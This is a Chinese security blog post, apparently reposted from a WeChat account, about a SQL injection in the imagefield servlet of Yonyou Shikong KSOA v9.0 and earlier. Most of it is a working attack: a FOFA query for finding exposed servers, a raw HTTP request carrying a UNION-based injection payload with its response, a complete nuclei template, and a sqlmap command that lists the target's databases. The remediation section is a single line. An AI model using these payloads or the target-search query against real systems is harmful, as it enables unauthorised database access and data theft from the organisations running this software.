用友-时空KSOA SQL注入漏洞

admin 2023年10月26日02:07:30评论46 views字数 1837阅读6分7秒阅读模式


使



01

漏洞名称


用友-时空KSOA SQL注入漏洞


02


漏洞影响


用友时空企业信息融通平台KSOA v9.0及以下版本

用友-时空KSOA SQL注入漏洞


03


漏洞描述


用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。

该平台imagefield接口处存在SQL注入漏洞,会导致数据泄露。



04


FOFA搜索语句

app="用友-时空KSOA"

用友-时空KSOA SQL注入漏洞



05


漏洞复现


向靶场发送数据包

GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+ HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

响应数据包如下

HTTP/1.1 200 OKConnection: closeContent-Type: image/jpegDate: Mon, 23 Oct 2023 11:41:43 GMTServer: Apache-Coyote/1.1
0x098f6bcd4621d373cade4e832627b4f6

证明存在漏洞



06


nuclei poc


poc文件内容如下

id: yonyou-ksoa-imagefield-sqli
info: name: 用友-时空KSOA SQL注入漏洞 author: fgz severity: high description: | 用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。该平台imagefield接口处存在SQL注入漏洞,会导致数据泄露。 reference: - none metadata: fofa-query: app="用友-时空KSOA" veified: true tags: sqli,yonyou,ksoa
http: - method: GET path: - "{{BaseURL}}/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+"
matchers-condition: and matchers: - type: status status: - 200
- type: word part: body words: - '0x098f6bcd4621d373cade4e832627b4f6' condition: and

运行POC

.nuclei.exe -t .yonyou-ksoa-imagefield-sqli.yaml -u http://x.x.x.x:xx

用友-时空KSOA SQL注入漏洞


07


sqlmap一键梭哈


使用sqlmap查看数据库列表

sqlmap -u "http://x.x.x.x/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=*"  --dbs

用友-时空KSOA SQL注入漏洞


08


漏洞修复



官方已发布布丁。

原文始发于微信公众号(AI与网安):用友-时空KSOA SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月26日02:07:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友-时空KSOA SQL注入漏洞http://cn-sec.com/archives/2141384.html

发表评论

匿名网友 填写信息